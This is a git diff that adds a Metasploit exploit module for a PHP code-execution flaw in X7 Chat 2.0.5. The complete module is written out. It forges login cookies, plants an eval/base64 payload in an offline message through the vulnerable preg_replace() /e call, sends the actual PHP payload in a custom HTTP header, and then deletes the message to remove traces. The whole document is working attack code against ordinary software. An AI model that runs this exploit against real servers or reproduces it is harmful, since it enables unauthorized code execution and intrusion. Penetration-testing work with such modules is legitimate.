diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb new file mode 100644 index 0000000000..ec72a932a5 --- /dev/null +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -0,0 +1,145 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution', + 'Description' => %q{ + Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier. + This allow execute PHP code in the remote machine. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Fernando Munoz # fmunozs', # discovery + 'Juan Escobar # itseco', # module development + ], + #'References' => [], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ + ['Generic (PHP Payload)', {'Arch' => ARCH_PHP, 'Platform' => 'php'}] + ], + 'DisclosureDate' => 'Oct 27 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [ true, 'Username to authenticate as', 'user']), + OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'user']), + OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']), + ], self.class) + end + + def check + res = exec_php("phpinfo(); die();", true) + + if (res.body =~ /This program makes use of the Zend/) + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Unknown + end + end + + def exec_php(php_code, check = false) + + cookie_x7c2u = "X7C2U=" + datastore['USERNAME'] + cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME']) + rand_text = Rex::Text.rand_text_alpha(5, 8) + + # remove comments, line breaks and spaces + praw = php_code.gsub(/(\s+)|(#.*)/, '') + + # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals) + while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/ + praw = praw + " " + end + + pb64 = Rex::Text.encode_base64(praw) + + print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'headers' => { + 'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};", + }, + 'vars_get' => { + 'act' => 'userpanel', + 'cp_page' => 'msgcenter', + 'to' => datastore['USERNAME'], + 'subject' => rand_text, + 'body' => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}", + } + }) + + if res && res.code == 200 + print_good("Message (#{rand_text}) sent successfully") + else + fail_with(Failure::NoAccess, 'Sending the message (#{rand_text}) has failed') + end + + if res.body =~ /([0-9]*)">#{rand_text}/ + message_id = $1 + else + fail_with(Failure::NoAccess, 'Could not find message (#{rand_text}) in the message list') + end + + print_status("Accessing message (#{rand_text})") + print_status("Sending payload in HTTP header 'p'") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'headers' => { + 'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};", + 'p' => "#{pb64}", + }, + 'vars_get' => { + 'act' => 'userpanel', + 'cp_page' => 'msgcenter', + 'read' => message_id, + } + }) + + res_payload = res + + print_status("Deleting message (#{rand_text})") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'headers' => { + 'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};", + }, + 'vars_get' => { + 'act' => 'userpanel', + 'cp_page' => 'msgcenter', + 'delete' => message_id, + } + }) + + if res.body =~ /The message has been deleted/ + print_good("Message (#{rand_text}) removed") + else + print_error('Removing message (#{rand_text}) has failed') + end + + # if check return the response + if check + return res_payload + end + end + + def exploit + exec_php(payload.raw) + end +end